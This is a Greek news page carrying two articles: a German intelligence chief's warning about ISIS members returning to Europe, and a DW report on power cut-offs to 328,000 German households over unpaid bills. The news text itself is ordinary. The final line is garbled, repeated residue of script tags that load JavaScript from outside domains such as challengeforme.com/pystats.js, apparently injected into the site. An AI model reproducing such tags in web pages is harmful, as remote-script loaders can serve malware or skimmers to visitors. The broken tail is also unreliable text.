Γερμανική αντικατασκοπεία: Κίνδυνος από μέλη του ISIS που επιστρέφουν

Αποτέλεσμα εικόνας για ISIS

Νέα προειδοποίηση για μέλη του ISIS που επιστρέφουν στα ευρωπαϊκά κράτη μετά από την πτώση του Ισλαμικού Κράτους, απευθύνει κορυφαίο μέλος της γερμανικής μυστικής υπηρεσίας, υποστηρίζοντας πως υπάρχει «μεγάλος κίνδυνος» από γυναίκες και παιδιά που έχουν υποστεί πλύση εγκεφάλου και επιστρέφουν στην Ευρώπη.

Ο επικεφαλής της γερμανικής μυστικής υπηρεσίας, Hans-Georg Maassen, τονίζει χαρακτηριστικά ότι «υπάρχουν παιδιά που έχουν υποστεί πλύση εγκεφάλου από τους τζιχαντιστές και έχουν ριζοσπαστικοποιηθεί, έτοιμα να δώσουν τη ζωή τους». «Είμαστε ήδη ενήμεροι για ορισμένες γυναίκες και εφήβους που έχουν επιστρέψει στις ευρωπαϊκές πόλεις, απ’ όπου ταξίδεψαν στο Ιράκ και τη Συρία, που είναι ύποπτοι και παρακολουθούνται», πρόσθεσε.

Αυτοί οι άνθρωποι, επισημαίνει ο επικεφαλής της γερμανικής μυστικής υπηρεσίας, έχουν εντρυφήσει βαθιά στην εξτρεμιστική ιδεολογία του ISIS και «πρέπει, ιδιαίτερα τις γυναίκες, να τις προσέχουμε σε κάθε τους βήμα».

Σύμφωνα με τα στοιχεία των γερμανικών υπηρεσιών, τουλάχιστον 1.000 πολίτες από τη Γερμανία μετακινήθηκαν στον ISIS, ενώ συνολικά στην Ευρώπη, οι υποστηρικτές που πολέμησαν με τους τζιχαντιστές, ανέρχονται σε περισσότερους από 15.000.

Ο Hans-Georg Maassen προειδοποιεί τις ευρωπαϊκές αρχές ότι εκτός από τους Ευρωπαίους πολίτες υποστηρικτές του Ισλαμικού Κράτους, πολλοί είναι οι τζιχαντιστές που θα επιχειρήσουν να μετακινηθούν στην Ευρώπη, με σκοπό να πραγματοποιήσουν τρομοκρατικές ενέργειες.

 

DW: Η γερμανική ΔΕΗ έκοψε το ρεύμα σε 328.000 νοικοκυριά!

Αποτέλεσμα εικόνας για ηλεκτρικοι πινακες
Σε 328.000 νοικοκυριά στη Γερμανία οι εταιρίες ηλεκτροδότησης έκοψαν πέρυσι το ρεύμα λόγω απλήρωτων λογαριασμών, ενώ παράλληλα περισσότερα από 6,5 εκατομμύρια νοικοκυριά απειλήθηκαν με διακοπή, όπως δείχνει έκθεση της Ομοσπονδιακής Υπηρεσίας Δικτύων. Οι εταιρίες ηλεκτροδότησης κόβουν το ρεύμα στη Γερμανία όταν οι πελάτες χρωστούν ποσά πάνω από 100 ευρώ και έχουν λάβει προηγουμένως προειδοποιητικές επιστολές. Για τα νοικοκυριά το κόστος επανασύνδεσης είναι δυσβάσταχτο. Δεν οφείλουν να πληρώσουν μόνο όσα χρωστούν, αλλά και να καταβάλουν περίπου 200 ευρώ για την επανασύνδεση ανάλογα με την εταιρία παροχής.

Ο Όλιβερ Κρίσερ, αντιπρόεδρος της Κ.Ο. των γερμανών Πρασίνων στο κοινοβούλιο θεωρεί ότι ο περιορισμός των διακοπών ρεύματος είναι εφικτός: «Εδώ και χρόνια γνωρίζουμε ότι οι διακοπές ρεύματος νοικοκυριών αφορούν ομάδες που αντιμετωπίζουν γενικότερα οικονομικά προβλήματα. Υπάρχουν μελέτες και προτάσεις για το πώς μπορεί να αποτραπεί μια διακοπή ρεύματος, όπως για παράδειγμα με τη μεσολάβηση υπηρεσιών εργασίας, καταναλωτικών οργανώσεων και οργανώσεων αρωγής. Υπάρχουν πόλεις όπως το Βούπερταλ όπου γίνεται ακριβώς αυτό και έτσι αποτρέπονται πολλές διακοπές ρεύματος σε νοικοκυριά».

Το ρεύμα κόβεται κυρίως σε ανθρώπους που ζουν μόνοι

Έκθεση του Γερμανικού Συνδέσμου των οργανώσεων αρωγής Caritas και του Κέντρου Ευρωπαϊκής Οικονομικής Έρευνας (ZEW) μελέτησε τις διακοπές ρεύματος στη Γερμανία και κρούει τον κώδωνα του κινδύνου. Τις περισσότερες προειδοποιήσεις για επαπειλούμενη διακοπή ρεύματος λαμβάνουν οικογένειες. Το ρεύμα ωστόσο κόβεται κυρίως σε ανθρώπους που ζουν μόνοι. Στις περισσότερες περιπτώσεις πρόκειται για ανθρώπους που ζουν από το κατώτερο κοινωνικό επίδομα.

«Το πρόβλημα είναι ότι η υπόθεση είναι γνωστή σε όλους, αλλά δυστυχώς δεν υπάρχει κανένας νόμος σε παγγερμανικό επίπεδο, λέει ο βουλευτής Όλιβερ Κρίσερ. Όπως φαίνεται οι πολιτικοί έχουν αποδεχθεί ότι το ρεύμα κόβεται κάθε χρόνο σε 330.000 νοικοκυριά. Γνωρίζουν ότι θα μπορούσαν να αναλάβουν πρωτοβουλία, αλλά τελικά δεν το κάνουν. Με εξοργίζει ότι όλα αυτά συμβαίνουν σε μια χώρα όπου τα αρμόδια υπουργεία βρίσκονται στα χέρια Σοσιαλδημοκρατών, οι οποίοι κάνουν προεκλογικό αγώνα ισχυριζόμενοι ότι θα δώσουν λύσεις, αλλά τουλάχιστον τα τελευταία τέσσερα χρόνια δεν συνέβη τίποτα προς αυτή την κατεύθυνση. Κι ας είναι γνωστό τι θα πρέπει να γίνει».

 ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >